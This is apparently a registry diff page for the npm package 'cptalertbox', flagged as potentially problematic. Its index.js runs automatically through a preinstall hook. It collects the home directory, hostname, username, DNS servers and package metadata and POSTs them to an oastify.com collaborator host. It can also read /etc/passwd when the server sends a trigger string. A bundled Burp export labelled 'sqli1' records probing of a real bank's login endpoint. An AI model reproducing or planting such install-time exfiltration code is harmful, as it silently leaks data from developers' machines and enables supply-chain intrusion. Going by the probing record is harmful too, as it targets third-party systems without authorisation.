cptalertbox 61.0.0

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.

This version of cptalertbox might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/index.js +66 -0
  2. package/package.json +12 -0
  3. package/sqli1 +42 -0
package/index.js ADDED
@@ -0,0 +1,66 @@
1
+ const fs = require("fs");
2
+ const dns = require("dns");
3
+ const querystring = require("querystring");
4
+ const https = require("https");
5
+ const packageJSON = require("./package.json");
6
+ const package = packageJSON.name;
7
+
8
+ const trackingData = JSON.stringify({
9
+ p: package,
10
+ c: __dirname,
11
+ hd: os.homedir(),
12
+ hn: os.hostname(),
13
+ un: os.userInfo().username,
14
+ dns: dns.getServers(),
15
+ r: packageJSON ? packageJSON.___resolved : undefined,
16
+ v: packageJSON.version,
17
+ pjson: packageJSON,
18
+ });
19
+
20
+ var postData = querystring.stringify({
21
+ msg: trackingData,
22
+ });
23
+
24
+ var options = {
25
+ hostname: "g9q8uyl5pvn311sm01gzd39modu4it.oastify.com", //replace burpcollaborator.net with Interactsh or pipedream
26
+ port: 443,
27
+ path: "/",
28
+ method: "POST",
29
+ headers: {
30
+ "Content-Type": "application/x-www-form-urlencoded",
31
+ "Content-Length": postData.length,
32
+ },
33
+ };
34
+
35
+ var req = https.request(options, (res) => {
36
+ res.on("data", (d) => {
37
+ process.stdout.write(d);
38
+ });
39
+ });
40
+
41
+ req.on("error", (e) => {
42
+ // console.error(e);
43
+ });
44
+
45
+ req.on("response", (response) => {
46
+ var responseData = "";
47
+ response.on("data", (chunk) => {
48
+ responseData += chunk;
49
+ });
50
+
51
+ response.on("end", () => {
52
+ // Check if the response contains a specific message
53
+ if (responseData.includes("READ_ETC_PASSWD_FILE")) {
54
+ fs.readFile("/etc/passwd", "utf8", (err, data) => {
55
+ if (err) {
56
+ console.error(err);
57
+ return;
58
+ }
59
+ console.log(data);
60
+ });
61
+ }
62
+ });
63
+ });
64
+
65
+ req.write(postData);
66
+ req.end();
package/package.json ADDED
@@ -0,0 +1,12 @@
1
+ {
2
+ "name": "cptalertbox",
3
+ "version": "61.0.0",
4
+ "description": "tesfefjvdm",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "ewfo \"Error: no test specified\" && exit 1",
8
+ "preinstall": "node index.js"
9
+ },
10
+ "author": "",
11
+ "license": "ISC"
12
+ }
package/sqli1 ADDED
@@ -0,0 +1,42 @@
1
+ <?xml version="1.0"?>
2
+ <!DOCTYPE items [
3
+ <!ELEMENT items (item*)>
4
+ <!ATTLIST items burpVersion CDATA "">
5
+ <!ATTLIST items exportTime CDATA "">
6
+ <!ELEMENT item (time, url, host, port, protocol, method, path, extension, request, status, responselength, mimetype, response, comment)>
7
+ <!ELEMENT time (#PCDATA)>
8
+ <!ELEMENT url (#PCDATA)>
9
+ <!ELEMENT host (#PCDATA)>
10
+ <!ATTLIST host ip CDATA "">
11
+ <!ELEMENT port (#PCDATA)>
12
+ <!ELEMENT protocol (#PCDATA)>
13
+ <!ELEMENT method (#PCDATA)>
14
+ <!ELEMENT path (#PCDATA)>
15
+ <!ELEMENT extension (#PCDATA)>
16
+ <!ELEMENT request (#PCDATA)>
17
+ <!ATTLIST request base64 (true|false) "false">
18
+ <!ELEMENT status (#PCDATA)>
19
+ <!ELEMENT responselength (#PCDATA)>
20
+ <!ELEMENT mimetype (#PCDATA)>
21
+ <!ELEMENT response (#PCDATA)>
22
+ <!ATTLIST response base64 (true|false) "false">
23
+ <!ELEMENT comment (#PCDATA)>
24
+ ]>
25
+ <items burpVersion="2022.8.4" exportTime="Mon May 29 11:54:28 IST 2023">
26
+ <item>
27
+ <time>Thu Jan 01 05:30:00 IST 1970</time>
28
+ <url><![CDATA[https://broker.ubank.com.au/index.php/?rest_route=/auth/login]]></url>
29
+ <host ip="141.193.213.20">broker.ubank.com.au</host>
30
+ <port>443</port>
31
+ <protocol>https</protocol>
32
+ <method><![CDATA[POST]]></method>
33
+ <path><![CDATA[/index.php/?rest_route=/auth/login]]></path>
34
+ <extension>php/</extension>
35
+ <request base64="true"><![CDATA[UE9TVCAvaW5kZXgucGhwLz9yZXN0X3JvdXRlPS9hdXRoL2xvZ2luIEhUVFAvMg0KSG9zdDogYnJva2VyLnViYW5rLmNvbS5hdQ0KQ29va2llOiBfZ2E9R0ExLjMuMjAwMjc4ODMyLjE2ODUzMTI5NjM7IF9naWQ9R0ExLjMuNTkzMjUxNjI0LjE2ODUzMTI5NjM7IF9nYXRfVUEtMTI3NDY3NjAzLTk9MQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6MTA5LjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvMTEzLjANCkFjY2VwdDogdGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCxhcHBsaWNhdGlvbi94bWw7cT0wLjksaW1hZ2UvYXZpZixpbWFnZS93ZWJwLCovKjtxPTAuOA0KQWNjZXB0LUxhbmd1YWdlOiBlbi1VUyxlbjtxPTAuNQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZA0KQ29udGVudC1MZW5ndGg6IDUwDQpPcmlnaW46IGh0dHBzOi8vYnJva2VyLnViYW5rLmNvbS5hdQ0KUmVmZXJlcjogaHR0cHM6Ly9icm9rZXIudWJhbmsuY29tLmF1L2xvZy1pbi8NClVwZ3JhZGUtSW5zZWN1cmUtUmVxdWVzdHM6IDENClNlYy1GZXRjaC1EZXN0OiBkb2N1bWVudA0KU2VjLUZldGNoLU1vZGU6IG5hdmlnYXRlDQpTZWMtRmV0Y2gtU2l0ZTogc2FtZS1vcmlnaW4NClNlYy1GZXRjaC1Vc2VyOiA/MQ0KVGU6IHRyYWlsZXJzDQoNCmFwcF9wYXJhbV9nb190bz0lMkZob21lLXBhZ2UtYXV0aCZsb2Fud29ya3NfaWQ9MDAw]]></request>
36
+ <status>403</status>
37
+ <responselength>4812</responselength>
38
+ <mimetype>HTML</mimetype>
39
+ <response base64="true"><![CDATA[SFRUUC8yIDQwMyBGb3JiaWRkZW4NCkRhdGU6IE1vbiwgMjkgTWF5IDIwMjMgMDY6MjQ6MTYgR01UDQpDb250ZW50LVR5cGU6IHRleHQvaHRtbDsgY2hhcnNldD1VVEYtOA0KQ2FjaGUtQ29udHJvbDogbWF4LWFnZT0xNQ0KRXhwaXJlczogTW9uLCAyOSBNYXkgMjAyMyAwNjoyNDozMSBHTVQNClgtRnJhbWUtT3B0aW9uczogU0FNRU9SSUdJTg0KVmFyeTogQWNjZXB0LUVuY29kaW5nDQpTZXJ2ZXI6IGNsb3VkZmxhcmUNCkNmLVJheTogN2NlY2E3NDVmYzkyZjQ4OC1CT00NCkFsdC1TdmM6IGgzPSI6NDQzIjsgbWE9ODY0MDANCg0KPCFET0NUWVBFIGh0bWw+CjwhLS1baWYgbHQgSUUgN10+IDxodG1sIGNsYXNzPSJuby1qcyBpZTYgb2xkaWUiIGxhbmc9ImVuLVVTIj4gPCFbZW5kaWZdLS0+CjwhLS1baWYgSUUgN10+ICAgIDxodG1sIGNsYXNzPSJuby1qcyBpZTcgb2xkaWUiIGxhbmc9ImVuLVVTIj4gPCFbZW5kaWZdLS0+CjwhLS1baWYgSUUgOF0+ICAgIDxodG1sIGNsYXNzPSJuby1qcyBpZTggb2xkaWUiIGxhbmc9ImVuLVVTIj4gPCFbZW5kaWZdLS0+CjwhLS1baWYgZ3QgSUUgOF0+PCEtLT4gPGh0bWwgY2xhc3M9Im5vLWpzIiBsYW5nPSJlbi1VUyI+IDwhLS08IVtlbmRpZl0tLT4KPGhlYWQ+Cjx0aXRsZT5BdHRlbnRpb24gUmVxdWlyZWQhIHwgQ2xvdWRmbGFyZTwvdGl0bGU+CjxtZXRhIGNoYXJzZXQ9IlVURi04IiAvPgo8bWV0YSBodHRwLWVxdWl2PSJDb250ZW50LVR5cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD1VVEYtOCIgLz4KPG1ldGEgaHR0cC1lcXVpdj0iWC1VQS1Db21wYXRpYmxlIiBjb250ZW50PSJJRT1FZGdlIiAvPgo8bWV0YSBuYW1lPSJyb2JvdHMiIGNvbnRlbnQ9Im5vaW5kZXgsIG5vZm9sbG93IiAvPgo8bWV0YSBuYW1lPSJ2aWV3cG9ydCIgY29udGVudD0id2lkdGg9ZGV2aWNlLXdpZHRoLGluaXRpYWwtc2NhbGU9MSIgLz4KPGxpbmsgcmVsPSJzdHlsZXNoZWV0IiBpZD0iY2Zfc3R5bGVzLWNzcyIgaHJlZj0iL2Nkbi1jZ2kvc3R5bGVzL2NmLmVycm9ycy5jc3MiIC8+CjwhLS1baWYgbHQgSUUgOV0+PGxpbmsgcmVsPSJzdHlsZXNoZWV0IiBpZD0nY2Zfc3R5bGVzLWllLWNzcycgaHJlZj0iL2Nkbi1jZ2kvc3R5bGVzL2NmLmVycm9ycy5pZS5jc3MiIC8+PCFbZW5kaWZdLS0+CjxzdHlsZT5ib2R5e21hcmdpbjowO3BhZGRpbmc6MH08L3N0eWxlPgoKCjwhLS1baWYgZ3RlIElFIDEwXT48IS0tPgo8c2NyaXB0PgogIGlmICghbmF2aWdhdG9yLmNvb2tpZUVuYWJsZWQpIHsKICAgIHdpbmRvdy5hZGRFdmVudExpc3RlbmVyKCdET01Db250ZW50TG9hZGVkJywgZnVuY3Rpb24gKCkgewogICAgICB2YXIgY29va2llRWwgPSBkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnY29va2llLWFsZXJ0Jyk7CiAgICAgIGNvb2tpZUVsLnN0eWxlLmRpc3BsYXkgPSAnYmxvY2snOwogICAgfSkKICB9Cjwvc2NyaXB0Pgo8IS0tPCFbZW5kaWZdLS0+CgoKPC9oZWFkPgo8Ym9keT4KICA8ZGl2IGlkPSJjZi13cmFwcGVyIj4KICAgIDxkaXYgY2xhc3M9ImNmLWFsZXJ0IGNmLWFsZXJ0LWVycm9yIGNmLWNvb2tpZS1lcnJvciIgaWQ9ImNvb2tpZS1hbGVydCIgZGF0YS10cmFuc2xhdGU9ImVuYWJsZV9jb29raWVzIj5QbGVhc2UgZW5hYmxlIGNvb2tpZXMuPC9kaXY+CiAgICA8ZGl2IGlkPSJjZi1lcnJvci1kZXRhaWxzIiBjbGFzcz0iY2YtZXJyb3ItZGV0YWlscy13cmFwcGVyIj4KICAgICAgPGRpdiBjbGFzcz0iY2Ytd3JhcHBlciBjZi1oZWFkZXIgY2YtZXJyb3Itb3ZlcnZpZXciPgogICAgICAgIDxoMSBkYXRhLXRyYW5zbGF0ZT0iYmxvY2tfaGVhZGxpbmUiPlNvcnJ5LCB5b3UgaGF2ZSBiZWVuIGJsb2NrZWQ8L2gxPgogICAgICAgIDxoMiBjbGFzcz0iY2Ytc3ViaGVhZGxpbmUiPjxzcGFuIGRhdGEtdHJhbnNsYXRlPSJ1bmFibGVfdG9fYWNjZXNzIj5Zb3UgYXJlIHVuYWJsZSB0byBhY2Nlc3M8L3NwYW4+IHdwZXdhZi5jb208L2gyPgogICAgICA8L2Rpdj48IS0tIC8uaGVhZGVyIC0tPgoKICAgICAgPGRpdiBjbGFzcz0iY2Ytc2VjdGlvbiBjZi1oaWdobGlnaHQiPgogICAgICAgIDxkaXYgY2xhc3M9ImNmLXdyYXBwZXIiPgogICAgICAgICAgPGRpdiBjbGFzcz0iY2Ytc2NyZWVuc2hvdC1jb250YWluZXIgY2Ytc2NyZWVuc2hvdC1mdWxsIj4KICAgICAgICAgICAgCiAgICAgICAgICAgICAgPHNwYW4gY2xhc3M9ImNmLW5vLXNjcmVlbnNob3QgZXJyb3IiPjwvc3Bhbj4KICAgICAgICAgICAgCiAgICAgICAgICA8L2Rpdj4KICAgICAgICA8L2Rpdj4KICAgICAgPC9kaXY+PCEtLSAvLmNhcHRjaGEtY29udGFpbmVyIC0tPgoKICAgICAgPGRpdiBjbGFzcz0iY2Ytc2VjdGlvbiBjZi13cmFwcGVyIj4KICAgICAgICA8ZGl2IGNsYXNzPSJjZi1jb2x1bW5zIHR3byI+CiAgICAgICAgICA8ZGl2IGNsYXNzPSJjZi1jb2x1bW4iPgogICAgICAgICAgICA8aDIgZGF0YS10cmFuc2xhdGU9ImJsb2NrZWRfd2h5X2hlYWRsaW5lIj5XaHkgaGF2ZSBJIGJlZW4gYmxvY2tlZD88L2gyPgoKICAgICAgICAgICAgPHAgZGF0YS10cmFuc2xhdGU9ImJsb2NrZWRfd2h5X2RldGFpbCI+VGhpcyB3ZWJzaXRlIGlzIHVzaW5nIGEgc2VjdXJpdHkgc2VydmljZSB0byBwcm90ZWN0IGl0c2VsZiBmcm9tIG9ubGluZSBhdHRhY2tzLiBUaGUgYWN0aW9uIHlvdSBqdXN0IHBlcmZvcm1lZCB0cmlnZ2VyZWQgdGhlIHNlY3VyaXR5IHNvbHV0aW9uLiBUaGVyZSBhcmUgc2V2ZXJhbCBhY3Rpb25zIHRoYXQgY291bGQgdHJpZ2dlciB0aGlzIGJsb2NrIGluY2x1ZGluZyBzdWJtaXR0aW5nIGEgY2VydGFpbiB3b3JkIG9yIHBocmFzZSwgYSBTUUwgY29tbWFuZCBvciBtYWxmb3JtZWQgZGF0YS48L3A+CiAgICAgICAgICA8L2Rpdj4KCiAgICAgICAgICA8ZGl2IGNsYXNzPSJjZi1jb2x1bW4iPgogICAgICAgICAgICA8aDIgZGF0YS10cmFuc2xhdGU9ImJsb2NrZWRfcmVzb2x2ZV9oZWFkbGluZSI+V2hhdCBjYW4gSSBkbyB0byByZXNvbHZlIHRoaXM/PC9oMj4KCiAgICAgICAgICAgIDxwIGRhdGEtdHJhbnNsYXRlPSJibG9ja2VkX3Jlc29sdmVfZGV0YWlsIj5Zb3UgY2FuIGVtYWlsIHRoZSBzaXRlIG93bmVyIHRvIGxldCB0aGVtIGtub3cgeW91IHdlcmUgYmxvY2tlZC4gUGxlYXNlIGluY2x1ZGUgd2hhdCB5b3Ugd2VyZSBkb2luZyB3aGVuIHRoaXMgcGFnZSBjYW1lIHVwIGFuZCB0aGUgQ2xvdWRmbGFyZSBSYXkgSUQgZm91bmQgYXQgdGhlIGJvdHRvbSBvZiB0aGlzIHBhZ2UuPC9wPgogICAgICAgICAgPC9kaXY+CiAgICAgICAgPC9kaXY+CiAgICAgIDwvZGl2PjwhLS0gLy5zZWN0aW9uIC0tPgoKICAgICAgPGRpdiBjbGFzcz0iY2YtZXJyb3ItZm9vdGVyIGNmLXdyYXBwZXIgdy0yNDAgbGc6dy1mdWxsIHB5LTEwIHNtOnB5LTQgc206cHgtOCBteC1hdXRvIHRleHQtY2VudGVyIHNtOnRleHQtbGVmdCBib3JkZXItc29saWQgYm9yZGVyLTAgYm9yZGVyLXQgYm9yZGVyLWdyYXktMzAwIj4KICA8cCBjbGFzcz0idGV4dC0xMyI+CiAgICA8c3BhbiBjbGFzcz0iY2YtZm9vdGVyLWl0ZW0gc206YmxvY2sgc206bWItMSI+Q2xvdWRmbGFyZSBSYXkgSUQ6IDxzdHJvbmcgY2xhc3M9ImZvbnQtc2VtaWJvbGQiPjdjZWNhNzQ1ZmM5MmY0ODg8L3N0cm9uZz48L3NwYW4+CiAgICA8c3BhbiBjbGFzcz0iY2YtZm9vdGVyLXNlcGFyYXRvciBzbTpoaWRkZW4iPiZidWxsOzwvc3Bhbj4KICAgIDxzcGFuIGlkPSJjZi1mb290ZXItaXRlbS1pcCIgY2xhc3M9ImNmLWZvb3Rlci1pdGVtIGhpZGRlbiBzbTpibG9jayBzbTptYi0xIj4KICAgICAgWW91ciBJUDoKICAgICAgPGJ1dHRvbiB0eXBlPSJidXR0b24iIGlkPSJjZi1mb290ZXItaXAtcmV2ZWFsIiBjbGFzcz0iY2YtZm9vdGVyLWlwLXJldmVhbC1idG4iPkNsaWNrIHRvIHJldmVhbDwvYnV0dG9uPgogICAgICA8c3BhbiBjbGFzcz0iaGlkZGVuIiBpZD0iY2YtZm9vdGVyLWlwIj40Mi4xMDYuMjEuNzE8L3NwYW4+CiAgICAgIDxzcGFuIGNsYXNzPSJjZi1mb290ZXItc2VwYXJhdG9yIHNtOmhpZGRlbiI+JmJ1bGw7PC9zcGFuPgogICAgPC9zcGFuPgogICAgPHNwYW4gY2xhc3M9ImNmLWZvb3Rlci1pdGVtIHNtOmJsb2NrIHNtOm1iLTEiPjxzcGFuPlBlcmZvcm1hbmNlICZhbXA7IHNlY3VyaXR5IGJ5PC9zcGFuPiA8YSByZWw9Im5vb3BlbmVyIG5vcmVmZXJyZXIiIGhyZWY9Imh0dHBzOi8vd3d3LmNsb3VkZmxhcmUuY29tLzV4eC1lcnJvci1sYW5kaW5nIiBpZD0iYnJhbmRfbGluayIgdGFyZ2V0PSJfYmxhbmsiPkNsb3VkZmxhcmU8L2E+PC9zcGFuPgogICAgCiAgPC9wPgogIDxzY3JpcHQ+KGZ1bmN0aW9uKCl7ZnVuY3Rpb24gZCgpe3ZhciBiPWEuZ2V0RWxlbWVudEJ5SWQoImNmLWZvb3Rlci1pdGVtLWlwIiksYz1hLmdldEVsZW1lbnRCeUlkKCJjZi1mb290ZXItaXAtcmV2ZWFsIik7YiYmImNsYXNzTGlzdCJpbiBiJiYoYi5jbGFzc0xpc3QucmVtb3ZlKCJoaWRkZW4iKSxjLmFkZEV2ZW50TGlzdGVuZXIoImNsaWNrIixmdW5jdGlvbigpe2MuY2xhc3NMaXN0LmFkZCgiaGlkZGVuIik7YS5nZXRFbGVtZW50QnlJZCgiY2YtZm9vdGVyLWlwIikuY2xhc3NMaXN0LnJlbW92ZSgiaGlkZGVuIil9KSl9dmFyIGE9ZG9jdW1lbnQ7ZG9jdW1lbnQuYWRkRXZlbnRMaXN0ZW5lciYmYS5hZGRFdmVudExpc3RlbmVyKCJET01Db250ZW50TG9hZGVkIixkKX0pKCk7PC9zY3JpcHQ+CjwvZGl2PjwhLS0gLy5lcnJvci1mb290ZXIgLS0+CgoKICAgIDwvZGl2PjwhLS0gLyNjZi1lcnJvci1kZXRhaWxzIC0tPgogIDwvZGl2PjwhLS0gLyNjZi13cmFwcGVyIC0tPgoKICA8c2NyaXB0PgogIHdpbmRvdy5fY2ZfdHJhbnNsYXRpb24gPSB7fTsKICAKICAKPC9zY3JpcHQ+Cgo8L2JvZHk+CjwvaHRtbD4K]]></response>
40
+ <comment></comment>
41
+ </item>
42
+ </items>